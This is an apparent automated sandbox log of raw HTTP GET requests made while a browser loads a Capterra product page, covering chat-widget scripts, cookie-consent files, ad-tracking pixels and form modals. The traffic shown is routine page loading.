Source: global traffic HTTP traffic detected: GET /core/assets/css/16.22abfce0.chunk.css HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/52.b1edaf4a.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/37.b6614199.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/22.6b9a301a.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/19.6f85b843.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /scripttemplates/otSDKStub.js HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /consent/989b7b21-d05b-49b3-9b8a-3dbec459287a/989b7b21-d05b-49b3-9b8a-3dbec459287a.json HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /scripttemplates/202403.2.0/otBannerSdk.js HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /include/1725034800000/5amzsk8w99z9.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1Host: geolocation.onetrust.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /web-vitals@4.2.3/dist/web-vitals.iife.js HTTP/1.1Host: unpkg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /us1/v5/datadog-rum.js HTTP/1.1Host: www.datadoghq-browser-agent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/runtime~main.72ecb88a.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/main~493df0b3.8510c064.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/9.4a3e9801.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /activityi;dc_pre=CI_uo9mOnYgDFU1OpAQdGH4MHw;src=8036043;type=visit;cat=capte0;ord=8816183541542;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=484373263;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F? HTTP/1.1Host: 8036043.fls.doubleclick.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUnLy_oPAn3RQQGGTmGl0tTHi6Y8gDLMzI9EgAmspRIPtsEqTf9uSmtnMP0T6D4
Source: global traffic HTTP traffic detected: GET /pagead/1p-user-list/1072635088/?random=1725034607177&cv=11&fst=1725033600000&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&hn=www.googleadservices.com&frm=0&tiba=Publicate%20Pricing%2C%20Alternatives%20%26%20More%202024%20%7C%20Capterra&npa=0&pscdl=noapi&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDpaXnfreFr7UMJUwrxjcQQl0sATJa54prevAhrBa7LzEOEJMNWOgdD&random=2594997369&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /modal/6HyOcTRcBkZLAc2QGex3tl?formId=6HyOcTRcBkZLAc2QGex3tl HTTP/1.1Host: forms-as-a-service.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.capterra.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /modal/7DbjmVSFi4BGlfm43ATGbM?formId=7DbjmVSFi4BGlfm43ATGbM HTTP/1.1Host: forms-as-a-service.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.capterra.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /activity;register_conversion=1;src=8036043;type=visit;cat=capte0;ord=8816183541542;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=484373263;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F? HTTP/1.1Host: ad.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
Source: global traffic HTTP traffic detected: GET /pagead/viewthroughconversion/1072635088/?random=1725034607177&cv=11&fst=1725034607177&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&hn=www.googleadservices.com&frm=0&tiba=Publicate%20Pricing%2C%20Alternatives%20%26%20More%202024%20%7C%20Capterra&npa=0&pscdl=noapi&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
Source: global traffic HTTP traffic detected: GET /modal/3ob5sl3RSLbslH6LvzUKQc?formId=3ob5sl3RSLbslH6LvzUKQc HTTP/1.1Host: forms-as-a-service.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.capterra.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /faas-modal-payload.js?formId=6HyOcTRcBkZLAc2QGex3tl HTTP/1.1Host: forms-as-a-service.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034608.59.0.0
Source: global traffic HTTP traffic detected: GET /faas-modal-payload.js?formId=7DbjmVSFi4BGlfm43ATGbM HTTP/1.1Host: forms-as-a-service.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034608.59.0.0
Source: global traffic HTTP traffic detected: GET /faas-modal-payload.js?formId=3ob5sl3RSLbslH6LvzUKQc HTTP/1.1Host: forms-as-a-service.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034608.59.0.0
Source: global traffic HTTP traffic detected: GET /core/assets/js/43.7ac85d58.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/19.6f85b843.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/20.8c21ea18.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/52.b1edaf4a.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /jserrors/1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=76603&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 HTTP/1.1Host: bam-cell.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=4a13c21de71e3a5f
Source: global traffic HTTP traffic detected: GET /core/assets/js/26.04e7f30b.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/14.e24a6190.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/11.639238ba.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/18.9c1bd1fb.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /consent/989b7b21-d05b-49b3-9b8a-3dbec459287a/018fce69-2081-771f-b4c1-f49c8e55a112/en.json HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.capterra.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/37.b6614199.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/22.6b9a301a.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /scripttemplates/202403.2.0/otBannerSdk.js HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
